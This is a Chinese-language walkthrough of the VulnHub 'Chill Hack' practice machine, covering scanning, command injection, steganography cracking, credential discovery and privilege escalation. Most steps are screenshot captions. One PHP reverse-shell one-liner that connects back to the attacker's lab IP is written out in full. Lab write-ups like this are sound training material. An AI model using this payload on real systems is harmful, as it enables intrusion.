vulnhub靶机Chill_Hack

下载地址:Chill Hack: 1 ~ VulnHub

主机发现

vulnhub靶机Chill_Hack_第1张图片

目标176

端口扫描

vulnhub靶机Chill_Hack_第2张图片

服务扫描

vulnhub靶机Chill_Hack_第3张图片

vulnhub靶机Chill_Hack_第4张图片

直接去看web

vulnhub靶机Chill_Hack_第5张图片

先扫一下

vulnhub靶机Chill_Hack_第6张图片

有几个有点问题

看着好像命令执行

vulnhub靶机Chill_Hack_第7张图片

看来没错直接反弹shell

vulnhub靶机Chill_Hack_第8张图片

还有还白名单?

bash也不能用

那就用php吧

whoami|php -r '$sock=fsockopen("192.168.21.131",666);exec("bash <&3 >&3 2>&3");'

vulnhub靶机Chill_Hack_第9张图片

搞定接下来就是提权了

vulnhub靶机Chill_Hack_第10张图片

vulnhub靶机Chill_Hack_第11张图片

有python吧shell弄一下

vulnhub靶机Chill_Hack_第12张图片

刚才代码的源码

接下来就是看看文件了

翻到咯

vulnhub靶机Chill_Hack_第13张图片

这里面提示我们去看看images

看看jpg

vulnhub靶机Chill_Hack_第14张图片

先用工具简单看看

vulnhub靶机Chill_Hack_第15张图片

啥都没有?我不信,换工具

vulnhub靶机Chill_Hack_第16张图片

vulnhub靶机Chill_Hack_第17张图片

密码爆破(这个方法最快)

vulnhub靶机Chill_Hack_第18张图片

vulnhub靶机Chill_Hack_第19张图片

看看文件

vulnhub靶机Chill_Hack_第20张图片

审计就完了

vulnhub靶机Chill_Hack_第21张图片

好好好密码写代码里面狠

密码到手剩下用户名了

看到有ftp去看看,说不定有匿名

vulnhub靶机Chill_Hack_第22张图片

额啥也不是直接用户名算了

就这三名试试就行

vulnhub靶机Chill_Hack_第23张图片

好第一个就进去了

接下来就是提权

找一下能用该账户读取的文件

vulnhub靶机Chill_Hack_第24张图片

这边挺想看local的用点操作看一下

vulnhub靶机Chill_Hack_第25张图片

试试这个脚本会不会有问题

vulnhub靶机Chill_Hack_第26张图片

不回显能执行命令

直接bash

vulnhub靶机Chill_Hack_第27张图片

成功了

docker逃逸就行

vulnhub靶机Chill_Hack_第28张图片

你可能感兴趣的:(vulnhub,网络安全,web安全,系统安全,网络攻击模型,安全)